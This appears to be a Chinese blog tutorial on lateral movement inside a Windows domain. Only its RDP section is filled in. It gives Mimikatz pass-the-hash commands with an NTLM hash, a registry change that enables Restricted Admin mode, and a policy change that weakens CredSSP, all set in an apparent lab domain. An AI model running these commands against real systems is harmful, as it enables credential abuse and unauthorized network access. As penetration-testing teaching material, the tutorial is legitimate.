【内网安全】域横向CobalStrike&SPN&RDP

本文介绍域内渗透的三种核心手法:使用Mimikatz进行RDP传递、利用SPN服务进行Kerberoast攻击以及借助CobaltStrike进行全方位渗透测试。详细展示了如何通过这些技术手段在已攻破的域环境中进一步拓展控制范围。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

演示案例:
• 域横向移动RDP传递-Mimikatz
• 域横向移动SPN服务-探针,请求,导出,破解,重写
• 域横向移动测试流程一把梭哈-CobaltStrike初体验


案例1-域横向移动RDP传递-Mimikatz

除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。
RDP协议连接判断对方远程桌面服务是否开启(默认:3389),端口扫描判断


RDP明文密码链接
windows: mstsc
mstsc.exe /console /v:192.168.3.21 /admin
linux: rdesktop 192.168.3.21:3389

Q:

解决:failed to open X11 display__囧囧_的博客-CSDN博客


RDP密文HASH链接
windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;

开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
开启后运行:
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"

一般在我的电脑——右键属性——远程设置

如果连接报错:出现身份验证错误/要求的函数不受支持的解决方案

windows专业版:打开gpedit.msc——计算机配置>管理模板>系统>凭据分配>加密数据库修正——选择启用并选择易受攻击
windows家庭版:打开gpedit.msc——找HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters(CredSSP\Parameters不存在则手动新建:左侧目录System点击右键,选择“新建 - 项”,输入文件夹名)——在Parameters 里 新建 DWORD(32位),名称:“AllowEncryptionOracle",值:2——再次连接远程桌面,若仍失败则重启电脑后再次尝试


开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值